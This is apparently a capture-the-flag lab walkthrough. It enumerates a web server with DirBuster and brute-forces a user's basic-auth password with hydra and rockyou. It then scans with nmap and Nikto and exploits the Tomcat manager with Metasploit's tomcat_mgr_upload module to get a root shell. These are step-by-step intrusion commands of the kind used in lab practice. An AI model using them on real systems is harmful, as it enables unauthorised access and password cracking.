[Task 1] ToysRus
- What directory can you find, that begins with a g?
- Open DirBuster
- input target url and wordlist
- Click Start and wait
open /guidelines/
http://<ip>/guidelines/
2. Whose name can you find from this directory? It’s in #1.
3. What directory has basic authentication?
4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with http-get form
hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.108 http-get /protected/
Try to login with cracked credential
5. What other port that serves a webs service is open on the machine?
Find open port
nmap -Pn 10.10.176.108
Find services
nmap -sV -T 4 10.10.176.108
6. Going to the service running on that port, what is the name and version of the software?
nmap -sV -A -T 4 10.10.176.108
Access Tomcat site on port 1234
7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?
Click Manager App
Try with credential
Let’s scan the site
nikto -h http://10.10.131.147:1234/manager/html -id bob:<password>
8. What is the server version (run the scan against port 80)?
9. What version of Apache-Coyote is this service using?
Answer is in #8.
10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?
msfconsole
search tomcatThere’re 3 exploits that I can use.
I tried to use #13 and #14, but it didn’t work. I’ll skip to #15.
Note: sometimes Metasploit is updated. The script is not always #15.
use 15oruse exploit/multi/http/tomcat_mgr_upload
show options
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234
run
Let’s get shell
shell
whoamiNow I’m root.
10. What text is in the file /root/flag.txt
cd /root
ls
cat flag.txt
